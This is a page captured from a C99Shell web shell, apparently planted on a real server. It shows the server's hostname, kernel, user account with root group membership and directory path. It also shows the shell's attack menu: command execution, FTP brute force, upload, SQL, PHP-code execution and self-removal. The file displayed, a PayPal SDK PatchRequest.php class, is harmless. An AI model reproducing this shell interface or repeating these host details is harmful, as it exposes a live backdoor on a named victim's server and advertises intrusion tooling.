!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PatchRequest.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class PatchRequest
 *
 * Request object used for a JSON Patch.
 *
 * @package PayPal\Api
 *
 * @property \PayPal\Api\Patch[] patches
 */
class PatchRequest extends PayPalModel
{
    
/**
     * Placeholder for holding array of patch objects
     *
     * @param \PayPal\Api\Patch[] $patches
     * 
     * @return $this
     */
    
public function setPatches($patches)
    {
        
$this->patches $patches;
        return 
$this;
    }

    
/**
     * Placeholder for holding array of patch objects
     *
     * @return \PayPal\Api\Patch[]
     */
    
public function getPatches()
    {
        return 
$this->patches;
    }

    
/**
     * Append Patches to the list.
     *
     * @param \PayPal\Api\Patch $patch
     * @return $this
     */
    
public function addPatch($patch)
    {
        if (!
$this->getPatches()) {
            return 
$this->setPatches(array($patch));
        } else {
            return 
$this->setPatches(
                
array_merge($this->getPatches(), array($patch))
            );
        }
    }

    
/**
     * Remove Patches from the list.
     *
     * @param \PayPal\Api\Patch $patch
     * @return $this
     */
    
public function removePatch($patch)
    {
        return 
$this->setPatches(
            
array_diff($this->getPatches(), array($patch))
        );
    }

    
/**
     * As PatchRequest holds the array of Patch object, we would override the json conversion to return
     * a json representation of array of Patch objects.
     *
     * @param int $options
     * @return mixed|string
     */
    
public function toJSON($options 0)
    {
        
$json = array();
        foreach (
$this->getPatches() as $patch) {
            
$json[] = $patch->toArray();
        }
        return 
str_replace('\\/''/'json_encode($json$options));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--